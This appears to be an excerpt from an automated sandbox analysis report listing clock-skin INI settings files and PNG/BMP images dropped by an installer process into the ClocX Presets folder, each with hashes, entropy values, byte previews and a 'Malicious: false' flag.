Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..f=IDATx.b...?.(... ..F.`d.......0.._.......V.."!3.x8....b.N..U..axj...0..ox&".LT.....e...U[..0............K.)6D.E>....`fB...)..S.j.......KD.. .)6... (_.....\.K.f..3..X..y....)...a.......l.......n.G.............f:.....6..bZ.2.5bI......xD...W..i.H>WS..........Q....N.".R..~..&.h........0.D.4T.".8..:......-.#.......)..a(....cE",..A.X.........o...R..5.....B.49.......&G.<..#p~....w...]...G..$/.,q~.or.....Y...).M.....2VA......=..,.../!.....St.:.u.b.$..>......I./....q9Z.@'.56SB.3.E$.J_.u.7k....yE.T..X7..!...P.L..J.s..G....\|a...`..".0z;....4..k..K.]+..9....A..-...F.U.4....-...0...y$..`.A\| .E.....@.E]....63.w.".l.&.......s)!....S.5@;.D.-q...t...[.NV.PW(\..#.......w$..n..\|:X...../........$..$....i..........>.mPW.....J...{>h..Ak.R.l.W.f.^.A......U....bb\|.....pp.D. PZ.w<..t.....[...S......)B..<...=S.Bl.B.Y......XDN2.......Xr...D.:.!S....

C:\Program Files (x86)\ClocX\Presets\Cappuccino.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.690989170901346
Encrypted:	false
SSDEEP:	12:LXe4EqmYrrrcRQBjpJrpqZ27XFPV+m1nXFPVG99XFPUXFqZ2kp0oH9Gst8ZVB2iU:LdEQrmu9rTOe01knkprdGm8ZWiWN2i
MD5:	FE5BE53D2267788942BB4D382592A376
SHA1:	A6B987CA380DE8FAE09E40A07B1460264B8A3186
SHA-256:	B0296C84A695FB91F33C65A0B7CC0DF52DE0FE610F9327CB07F43A288E7A88E5
SHA-512:	BD4E50321E012324FC0F2651135BBD11908599E7353EEECC1C017F456177DDF3D492A8A46613D11F3CAFEB6C961EC5C05A1FBDE31F8AB206C7C42B851F0D2BEB
Malicious:	false
Preview:	;Cappuccino ClocX skin by Shak @ AquaXP.com..;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red)..DisableAMPM=1 ;show AM/PM indicator (default 0)..AMPMColor=0x787878.;color of AM/PM indicator....HourColor=0x808080 ;color of hour hand..HourLength=30 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=2 ;width of hour hand....MinuteColor=0x404040 ;color of minute hand..MinuteLength=50 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x909090 ;color of second hand..SecondLength=50 ;length of second hand..SecondLap=10 ;overlap of second hand..SecondWidth=1 ;width of second hand....;CenterX=68 ;center point's X (default image_width / 2)..;CenterY=66 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\Cappuccino.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 140 x 140, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10177
Entropy (8bit):	7.873268670708565
Encrypted:	false
SSDEEP:	192:apbPCmV6zP1UjFjRWkIt68pM3dBvAgc+vlhWH65iHWRUtDOQbHy5RkcP8zY9pz:apb6TpUNRDsYFvPEHWj6cPWo
MD5:	399B9C9DC36DED079B004FAC8A2747E2
SHA1:	769A7A703E83FC62357E8B66017074C911A0616A
SHA-256:	8D47C549094F6868CDDC13042E2136318FEB819CDD3090C5804A98BEA59FC389
SHA-512:	36A8A32407755F6977CFB469A095D86D83CEF2A5FF2F0F6D65D92CF37FAE137D5900A011121E4BEBA0537D0E0A89231DE1AF6580E1D965037923CF255C782C06
Malicious:	false
Preview:	.PNG........IHDR...............A>....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..'SIDATx.b...?.(......b...Q@... .....q........O.?..@.....A,Ml.!..V. .X.y........X.161l.C.....0O L..3.....:qss;....011.311I#..U3'J....;....<..}.......>.<x.......H......H@.....%..6.....M..vv6.....,,.@1...AM............;.,,.'..h.W.... ..Z.A.M...I@..GkkC&...733..P...O...)f.J..._.......)........%...J..@......$a.t.T2.._..j.x..DB.0.....y.v....\|h".....D...@.=.`.n...a.. ...j.\|6t....@.........K........p.....@.5.`-M.\8.%(......9..n\..L.Bu.#...........V....(u.......`.&...O.........I(......%.....#...`\|FX...../ZML..._..3...@......e..+W.f.......?,bp%..S..'.\|jP.....>.~..OO.t.Z..w.4...h0$..R..P@m.%%.e@7..+..3.K.]...jBA..#.....8q.((....3...@.1.p..\......w.^...t..X ....0..Xd>)....E b..a6#....Y....8...cI...XXX$ml.w?xps......a...#hX!.H.....@.0.......V?.^..F. . .a....h.....D8!G6#<.Af#'..zj.%.,.B...._O.>.72......V.......H0(%..T........l..P...".0 ....>*..q.K.D..ZZ.............r..=.@..........9s..

C:\Program Files (x86)\ClocX\Presets\CarpeDiem.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1432
Entropy (8bit):	4.852570033640407
Encrypted:	false
SSDEEP:	24:BEa2rPCkjbHSCEsrTNTOe01rfLkpGdGm8Ri+gFFibQ0Wd9iBxLuQI:B4VbHHIG4dGmSgFyQJTiBxLvI
MD5:	3F95C7C4C98812F4937DE9230FEB4C12
SHA1:	6E9299AE2A062BA6914C4F824CD5B7F7F5FF995E
SHA-256:	9E07C7737174B058C6ECFA5A82B5093D8647467C5A30BE39497F95CC1CD454BA
SHA-512:	F0F4B9FAB8EE3764DAC87AFC8D6AC1AAF95BE4195CBDBBE26C792546861E37D7B6E52BE9CAB157A09257F3F69B58D5880901F12C4EBCC210CC1A1CB107997BEC
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..DisableAMPM=1 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x808080 ;color of AM/PM indicator..AMPMFont=Verdana..AMPMFontSize=10 ;size of AM/PM font..AMPMCenterX=50..AMPMCenterY=68....DisableDate=0..DateColor=0xEEEEEE..DateFont=Verdana..DateFontSize=10..DateCenterX=61..DateCenterY=75....HourColor=0x800000 ;color of hour hand..HourLength=30 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x800000 ;color of minute hand..MinuteLength=42 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x808080 ;color of second hand..SecondLength=42 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....CenterX=59 ;center point's X (

C:\Program Files (x86)\ClocX\Presets\CarpeDiem.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 126 x 126, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13144
Entropy (8bit):	7.876979908992175
Encrypted:	false
SSDEEP:	384:yznpBXF4w8UxPB6ce72dVBp8qKmTHbdZUH:qXaV7EVhFCH
MD5:	1A5946136A4DAB0C22FD35DCCFAF5D12
SHA1:	1C7641A17EFEE9F3FC5C907ED081BC0763D4CF0B
SHA-256:	5CFD95F49197BA7EBA4BFB2B56B904B6C619EABDE6B2B5ADCEFAC264130F1347
SHA-512:	F92502320244C2CB7AF55DE0364252B71F9061F3262BDDCCE24003F2CA0ADDDB8B7178D65F2FA501AA5C31C744EA304CBF8D6FB43CCFD9E57C1798545ACD0DD8
Malicious:	false
Preview:	.PNG........IHDR...~...~......#......pHYs.................gAMA....aLA.... cHRM..z0..............qG...S..8....K..?..2.IDATx.b...?.(.y. .XF..u...A........e....{........'...@.....F._...P.p.S..Ax...>..FI.."..$\...:U......^1.\|.<.=..c.....h.G...2#.0................`1FF.W....apd.....L.S....@9....\.(.AI...............!...J..Ha...0..lP.3.r;P... q.2H........./....$...#8.!4.,.!z.b...C...B...p.%.............'s...R.)ev.....Z9..rF.A...=....B.....t.,.....K-...o......q.:@.B;..%.[..............,.[...41......./._.......t.$..:n.w<......q...3....Kj.....}5an..QU..._...t;.g....-...a....9....Xh..u.\|"..O..l'.}=.,.........d.9..W..Os.....lxHab.j2}j........5.\|J...7....>U..U.C.#j.....N...\|.....0....3..FP.V...$}.x.~.{.....'`..s.7...>..>.{6...6$.xTP........!..O..z.C."..M.)....r.....@.............a...8Px1A+k0........6.ffb....O.-..&...j.'$....{....pA3)..X....n'03....\|.........4../........i..._H....XE.............. ._P...!.>#......t.o........h.".^...5...7#."e.G4...AHK...,@....oV.\<n@!._

C:\Program Files (x86)\ClocX\Presets\Casio.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	4.809680141752885
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9Bx6TORXFB01PRzkpWdGIo81OiDLPEGibQ0Wd9iBxLuQI:BzqFlxFKgMdGJGBLPEpQJTiBxLvI
MD5:	247DB811DD18688D6134FB3199CF5C30
SHA1:	D82D5276AC82EFF8637B71D8EEE54149D17652EC
SHA-256:	EE4BA265429C986667B2B71D21D1FA0FAFEAD643DF2568594A3214F95E0DAC4B
SHA-512:	3248B043CB83682B22DEDABD6E1E83172B9AD9B6E3B473D10DADEDE9542CBF3B95B6B67337ABFE85BF1E91E1110883505C6095EE76B8722BA8D1BA43BA39697C
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....HourColor=000 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=5 ;width of hour hand....MinuteColor=000 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=4141216 ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=20 ;overlap of second hand..SecondWidth=2 ;width of second hand....CenterX=88 ;center point's X (default image_width / 2)..CenterY=105

C:\Program Files (x86)\ClocX\Presets\Casio.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 190 x 210, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	47377
Entropy (8bit):	7.991405637016689
Encrypted:	true
SSDEEP:	768:MgH34monBdcO89MlOEUp9/hXoIuFAMlalsAERfgNJJivcYIt:H0jkm0EUp9/2bFAMklIpQ
MD5:	771989CA35F956E5AF4E43DF7F9E27D5
SHA1:	E38B023D8C57225F7450B2FE0845877DE8C85F05
SHA-256:	264F1F3CA50008D5A28B30E08741663264BD30CD53005A804179BA8F6FB396FA
SHA-512:	FAB9E62E16F77C6B05EF304F696C5606F35BFCFBDCE5CF4A360F51EBEB51F0851B36D6EDC98BE077069394F336AA72C4BFF1D4F1C32F350FBB2B5556C68D7DED
Malicious:	false
Preview:	.PNG........IHDR..............Bz.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....].u&x.}9...4r$..........e...hK+iG......)..K3^.5...X.,.-Q.dY...IQL`&H. H......q.w.{n....F...u?.+.~..?.;.i6...Xx.{{8....X ....c........_x,<.............YX...?..@....._x,<.....X ....c........_x,<.....X ...G.?WX..{....y......c...u......,Y.G]]]..d2.~R<..P(D.p.".........<....o...n4.rl......?.S...w...V....)\|.^...R...].r.&''.P(....w......(.>\|.......c-...H..`......@Al.J.......{.......Z.h....R&.A.t..>...cz.>.6.x..-. T\|.D.k..g....Z........~_...a..0.....Q.r.D.\|...Fibb...z...".r9.{...kb\|.2555\(......7..$.....9.1......C.WF..M.phi"._.....8.....V.X.....;D.'.I!....C,9.L(.wtt...7.g..1...1.@.=...%...wx.O...%"q.s=....j........7....{<q/.J........O.-~34\|.X[..A:v.8.<y.....\|>?8==v...b.\9...h4....`......#..::..Y(....'.....R...R.......V5.c..B...g>...=...C.lV..0.."...Te)..C.0...+..=........B.q.``.0.~..S.>...J..z.]a.H..7.3....+.Wc.9to...}sB%...;x.u.X...'N..o....S'.1....

C:\Program Files (x86)\ClocX\Presets\Citizen.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	922
Entropy (8bit):	4.572711077292605
Encrypted:	false
SSDEEP:	24:BEurKluCXTzqr1sRHkLKOLgGLXoIdKghi0uSdUjn:B9K8VPkGUB+UT
MD5:	80C7B322338D51E96594DE91A5E3C603
SHA1:	D1E2F5689E71E04C2A90E0FE44882CAE67AB4AC1
SHA-256:	75C6DE781F983AAA2A4F2BB7315BDD1314C6C3F052435DD378AA0D1F8C0B0CCF
SHA-512:	F7B338B00963A5760261E375458B3135B7AC1E9D6DF87EA2EAC70A436629E4C0C0DF14425209593E947F851C92523E8A0E20D42E3A8E2FCBDD38486EE532C7B5
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0x0000FF ;cut window by this color (default red).ShowAMPM=0 ;show AM/PM indicator (default 0).AMPMColor=0x00000000.;color of AM/PM indicator..HourColor=0x2E3543 ;color of hour hand.HourLength=45 ;length of hour hand.HourLap=0 ;overlap of hour hand.HourWidth=5 ;width of hour hand..MinuteColor=0x2E3543 ;color of minute hand.MinuteLength=60 ;length of minute hand.MinuteLap=0 ;overlap of minute hand.MinuteWidth=3 ;width of minute hand..SecondColor=0x2E3543 ;color of second hand.SecondLength=65 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=1 ;width of second hand..CenterX=100 ;center point's X (default image_width / 2).CenterY=99 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\Citizen.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 200 x 199, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	75320
Entropy (8bit):	7.9941540871981
Encrypted:	true
SSDEEP:	1536:Engr3PcDKaKs6I/Dmqji+UUK7Rt+E8VyMkHsBP8jnZ5oi:f3PNnI/Fm+UUKekMkHkP8gi
MD5:	74D7455A9E42EDBA04A1FC8E5D1CA1A4
SHA1:	9D0CD86A18ACA40AAE14018EA9FA8B37A1D929F5
SHA-256:	B2391BB989C145731214525DD323CFE4978C87DD6781FD2A23E1209A2DF7115C
SHA-512:	2D7BCF50805437EDB759480BFD17D2B6C677CDB8DACA23C71AD5F8373E30E8F81A2734B0DC0F23F01B8C3D6DC90C0054BD061BF41F2039BD52DA6B09CAD8BDBB
Malicious:	false
Preview:	.PNG........IHDR.............\..K....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..%.IDATx...r.0.E/..`...]...l].....x.L..J.HR...!...4.....6....J:.2M...5.SQ.%...\U..A.1.9....e.K..k.N3..i..;.i.4m.[...4.4.q...i.S......z.0..i...s.P...../K.....<..[MUo..?^...,y....P7.PS..W......E..?.........QQ;.P..U....%O.]~{.........._...2.9J.;.#.K9..:.1....q.gQ.Hn.dY.(..6...T.X.k..-D-......q.0..q...!...%?!.}\]o..9jQ........X.. . ...GQ......Pp.....'...6....r.s.._..mOo9`..`.y.8^cC........7.;....G.v.e.A ..?.hc..+$.E...^ ..n.Z)...tL;..}...n8.....6.SIY..iZ....!.....vwpn..7....._F2.Z!%..+#.r....q.\A_.>..t.B!.k...P....WBY.C.7.w...J..R!.z.....EMz}..d.4.1...}.[......T...?,m..'.{e.. ...[....qad%qr..$L..Ag...._}.^.&.z..=.....BWI...<B.,!DtI.c......o.<...v.c....z... ....0n.z...3......9..j.Q.x.z.T.{N..!C..<...d2.3.>..T..\|7-,*i.jW.d..E(..drF...\..n.<}?Ha.T...............IA....kR..^..uU(.x..'.1......o.Q...8...l. .....7....e........,...j.

C:\Program Files (x86)\ClocX\Presets\CloQ.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1134
Entropy (8bit):	4.793200953489584
Encrypted:	false
SSDEEP:	24:BEQrGXz5lrkBJSaKy4qGTOXZZ410XiOkp5awGIo8bCiqwfQi:BzqFlCSf1qVX4jnDawGJQ8wfn
MD5:	4347579972618D2220B35D400E2497DF
SHA1:	CAE1FE63BE61C08C9880C21AD31C5E0F595596A2
SHA-256:	0901474F95A0FC08BF58F2E34CD2A46F3EE2A0B50742E6AB1D70B471BB084F6C
SHA-512:	B337F9408D55F39D2F781C2941DA02593B596709E5D890BDE69991643B2F18A4CB7A2D30F421477F83899F247306DB06570DAA0326DEB348D69836AE72539433
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x404040.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=9 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0xAA9696 ;color of hour hand..HourLength=20 ;length of hour hand..HourLap=2 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0xAA9696 ;color of minute hand..MinuteLength=30 ;length of minute hand..MinuteLap=2 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=32 ;length of second hand..SecondLap=2 ;overlap of second hand..SecondWidth=1 ;width of second hand....Cen

C:\Program Files (x86)\ClocX\Presets\CloQ.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 160 x 110, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12249
Entropy (8bit):	7.972601047733004
Encrypted:	false
SSDEEP:	192:xSx2nqVZzOLi+6PrSjnGhLaU5TZaMRF11U8yAgk0AaUNxTX0acFNNyZik72XdZ:Yx2mlOG+6UGhLxaM91U8ypk0BUNd3NwB
MD5:	49856033126C7EAD5EDC2B3A82504A7E
SHA1:	9FD4B61502C34A93B9C5E401AA84FE661559F575
SHA-256:	A9575B7EBACA877D5693DE98D9298317574BD6463E3EF129F8301C151698227D
SHA-512:	CF38A27ABA93210452431701BCECC53DE6259A244ACE2733F96B1D9A2BA2AAEA58B75FC5208220AB87D725ACF5D2EBEFADD9DD4FC6675E2323B6DADF71A9EE9C
Malicious:	false
Preview:	.PNG........IHDR.......n......-......bKGD..............pHYs............... .IDATx..yTU... ..Qdo..........Zy.evK.l.WETp..8.9.,5@..T...\..)h...P.+j.5..t...9..}.8......t..a-............A..y..B....'...\|....v....W.......Y.s.5.~v?.m...L.0....,...q..9......,U$.....j.n.8z.h.7.k..m....S.N.....j....N.<...FDDp...3g...Cwww...].P..;...F.h...@+....l..Z.x..r..Z..y...9s.L...133...BH.2%ICI.R.t..............`HH.=<<.woZZZj...`....l...r.l.`8....v..Y.fq.=,++.%.^2Y..p..j....2U5..UMR^.XY)S..58.,_.$...4.YRR.{.r...tuu%.R.!.F.x....;>.!.H.......(...}\|\|...I!$c.&.5ud...........LK;..4&%....Gx.......#LJ:..'N3==.99.1/.....zr.....V..={../g.....@..................wvv...W=...WVV...........xO.?.G..2##.yy.T.....).[bzz:....}{.8..s..*a...!.-.O.....chh(...(..j45.h..{.?.(ff.9.:.=..9h2$%..?.0?..B..Q........e.>}..w....S$\|.M.'.m.xXXX...1.......Z..55Wy..5.tWy.J.O...}....o......YPPDI..<.0.....9.!C.......<.....^.^.8....#G....$.Z..(.Z-../.211...{.{.^......bv..,/..zEm}...\|..v.$\|(.]8.......

C:\Program Files (x86)\ClocX\Presets\Comdex - Omega1.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1242
Entropy (8bit):	4.897976935663915
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9pk/7FoB35k6s4H6T13Z41rfLkc31CGm8bCinCd0X:BzqFlk/7Fy3u67C4ecFCGmQtCd6
MD5:	1FE0CF880A1FBD2C105E85361ECDD3F8
SHA1:	0B49F938CBCBBFB4F28FF070F85F9B01AE02470A
SHA-256:	22A6B9F1430102C28388DC50604FA010EAAE46778E1DEF800A8ACDF12B91F8C2
SHA-512:	B6FC3892CECB7AAA5CE4880B2518B01BF2796AC5BCD82A8CD4979F6A2E1592CE6E4D9215A09AF448765EEEB0BF5083CE6D4F114C728FA2A8226DF871B7C648A6
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Arial Narrow..AMPMFontSize=7 ;size of AM/PM font..AMPMCenterX=71..AMPMCenterY=173....DisableDate=0..DateColor=0x000000.; gray - 0x787878..DateFont=Arial Narrow..DateFontSize=7..DateCenterX=99..DateCenterY=157....HourColor=0x666666 ;color of hour hand - 0xAA9696..HourLength=35 ;length of hour hand..HourLap=2 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x444444 ;color of minute hand - 0xAA9696..MinuteLength=45 ;length of minute hand..MinuteLap=5 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=47 ;length of secon

C:\Program Files (x86)\ClocX\Presets\Comdex - Omega1.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 150 x 328, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	72778
Entropy (8bit):	7.986758581304158
Encrypted:	false
SSDEEP:	1536:IQSHf6+JZpEmnuiBXnfTb7UXhy/HShAypIe7w0+hdCsX/SOLFI6vD9ccIiUcjk3a:ne6UtVBXnrb70775khX60rvmcPjYa
MD5:	26E6D02144112F1919FCC08AC0F6CE07
SHA1:	7D3D5F287BF72C85C6B14C6F3FA8FD858367B542
SHA-256:	C5FDCEE509EC0AE18872EEA9DAEC67DBDF3C98552DB579B49FB0A88397BD8BEC
SHA-512:	3F4CF5A92673924CC7AA7D29F62C564D94824C9941E6D3A843029A94BF6250AEB0D9C1AB43000BAC4A6305019E50345F75EC10164CC291D7B3D25CCB6355E77E
Malicious:	false
Preview:	.PNG........IHDR.......H......B......pHYs.........g..R....gAMA....aLA.... cHRM..z%..............R....X..:....o.Z......IDATx....e.u...iOg...9Vf.<....@........d..E.mwKlZjw......b..pG....aw.%..-..$.l.$H.f..9.2o.w<......D".U....PWF.8w.S.......G...}>.?...._\|.......Ws..C.......kw^.........]>......O....;/y........9.\|.;.p70......................?V.}M...w...E...H..<..u...?D...X.F...[....H..P.....&.PI.......!e.Q...!.n,...1F.>`..x..n.......1.......l)M.O.{.ht;...@3E.g'O.XY...{E>...K.....c.....O..'...i...!M..m...J...^.....eU9...].....b......I....-..#.....1..]...v.K.c.....~@..[*.B.duu.__].......6..WWO...'G.....:0PB.....4u.^x.EU....\|P..L...".L.L.c/...\|....c.."H)...km\.$m...Q..M....d:-.j.\.GW._?.L...\|........:..)C].....p.h....Gq..... b..u..(}.e....?/.4E...a...6....'O.^_.....!.5M.R....\.mk..2...$.\|:..w.a:.r..}lll0..q..!.RP..@)u.m.R"...J+..0..<M.Wx...!X..M.m].....h..{}n.Y..6+..j..eC..}..._..w.^.qp.6`U@}.u.l... b...n.{n....y.L.^.I.............d..S...VF..O?..

C:\Program Files (x86)\ClocX\Presets\DSX4.BMP

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 172 x 172 x 24, image size 88752, resolution 7874 x 7874 px/m, cbSize 88806, bits offset 54
Category:	dropped
Size (bytes):	88806
Entropy (8bit):	2.418590036691463
Encrypted:	false
SSDEEP:	192:zcQE3KmYlXNZqpg7fGMGXGk+z19sLtNfcCuzE73qAWxmmXbDyio52j8USDPsA:GKTXNsC7fGMGMzKcCFqLxDDyiOPUSrsA
MD5:	858779477D2CD597F1A2B379F25F2393
SHA1:	0639E3C09E3007B2B81E07A7F1FEDD80C340F325
SHA-256:	D08BB435160F30217FF90D2586E6178A5927787A453CA2B5B9F1F45F4D548D1F
SHA-512:	8635144EA3505FC2F17DB349913759B18BEB132C6ABE7CCF2E9FB672897A577A5DBB3937A2D7964A2F212D5CB6233AA0C3DE598862A26CA8177A76BECC06858E
Malicious:	false
Preview:	BM.Z......6...(....................Z....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\DSX4.TXT

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.505459612613831
Encrypted:	false
SSDEEP:	3:FERjVM0lLLiRFQLZQ:FERjzR66Q
MD5:	CCA118DA9D40AA92B4C49EA17402E071
SHA1:	933017121E0B936B1FF2BE7E3A0BAB114540E8D7
SHA-256:	3B5AECD81B46AAA3BEDAD81DE9A9B988F80B9EBA4552957500B842E61B27570B
SHA-512:	B5575F2BA60E965A7C1E589F24B2B1B5A1D17E05A5A24199AF778461F428F251D1D83DC3BE65C95111D8C06F1981AA384F2B88005877B1A6F2F63549275A17A4
Malicious:	false
Preview:	Creator of this background (dsx4.bmp) is jonnybravo.

C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	699
Entropy (8bit):	5.1520962367864565
Encrypted:	false
SSDEEP:	12:a4EqmYrrrcR5pjpJrtOphhAlL4GOy46hp7pEH3eJvzpEH9CPpEHoNlTYQBcpwcz:BEQrm5b7OSF4G66hpOUvm0SIrJi
MD5:	9873AB1C4F582F7DBA405E18BF9EC1F5
SHA1:	2ED9BB9613EBF3B11B334F0132C3AD7C24C64E28
SHA-256:	02908C5B2E4603C69ABBD0F6DD5BE49B2AE0C68036624C3001574B8F87970C1C
SHA-512:	25F9B0B0629FEE815574FEB5738352838AF8B01FFB13634DF1735CEF394DAB551F8448EC53A18A4C01983B8784B3290BC067F5A772EB5CA8521CCB520B0AF2BE
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xff0000 ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x201010.;color of AM/PM indicator....DisableDate=0..DateColor=0xFF0000..DateFont=Arial Rounded MT Bold..DateFontSize=24..DateCenterX=126..DateCenterY=263....HourPNG=DarkCrystalBall\hourhand-7.png..HourPNGCenterDist=1....MinutePNG=DarkCrystalBall\minutehand-7.png..MinutePNGCenterDist=1....SecondPNG=DarkCrystalBall\secondhand-7.png..SecondPNGCenterDist=1....CenterX=129 ;center point's X (default image_width / 2)..CenterY=121 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 259 x 293, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	18381
Entropy (8bit):	7.906733896939069
Encrypted:	false
SSDEEP:	384:8XK3pDi4J8D6x2f07PdcijEepIP8n3ImeVEvXoGlQVcr:bDicTD7Pd5HIP83IxV3Glf
MD5:	7040CF8BADFFA9D06ACDD6EBDC09EE1B
SHA1:	FD1DD414926151A3CCF845225BD42283DABF666E
SHA-256:	53B13873417183ADC06FA7A02F044C4BE9AB7A34D7572D487B23DF1DC08C8292
SHA-512:	31876C0BD6B8AB89DADA1223D32D0305F1221C3C9A7D96FF9D81938499C26B1E840C47E836CADFC51192F84B465947B1B47B535DF4DBA33C413C6C6A3EA71670
Malicious:	false
Preview:	.PNG........IHDR.......%.......w.....tEXtCreation Time......().A......tIME.....3.4..#....pHYs.........B.4.....PLTE.............. .." .%!.)#"%$!,($.++%"2&$:%2(%:-)6.*90+52-;32350=82>;;;+)C2.C3.J3/P61B51K94D:5J=9C=8L63R64Z94T95[=9R<9\<:f>>q?@]@;EA;MH?OC=SB=ZI?PA=iA>rCCCEAKHEMKKKF@UD@[IBTIC[LJRMH]PFWPGYPNTSJ\SSTUSYYV\[[[DBcECjFHkKEbJEjNHdMIkGEwMQyRLiRMtUPfUPk\SdYSl^[b^[lXTx_`\|`Vi`]ccZlb[zcccfdihflkkle`se`}jbulczmkpkl{pf\|qnuri}sssvszyw\|{{{KI.QM.ZX.]Z.[`.\d.b].`^.fb.ie.hh.op.mp.sk.rl.vr.vs.\|q.{q.}{.}z.vr.jm.jv.m~.qn.ww.o..o..\|..w..}..x..}..t..u..}..z..z..\|..........................................................................................................................................................................................................................................................................................................f.......tRNS..........................................................................................................

C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall\hourhand-7.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 260 x 9, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	997
Entropy (8bit):	2.0884247801006333
Encrypted:	false
SSDEEP:	6:6v/lhPkgm0CcgCMkuldXGrr05PMnP8wE3BEdBNmoSaRRClb4Ja96mMcKhTVlljp:6v/7sCE2URmP8RBEdBNmoR04Ja9t6Tj
MD5:	DDC1CB30B5B35268F7C85E9E0F2F3039
SHA1:	41808DBE86473A57F1F327BC4740EAEFA9AFFE4F
SHA-256:	D338C477D7542D753C2E919F66C50FB53F8DFD22AE22D4E54A90DB895EF3E433
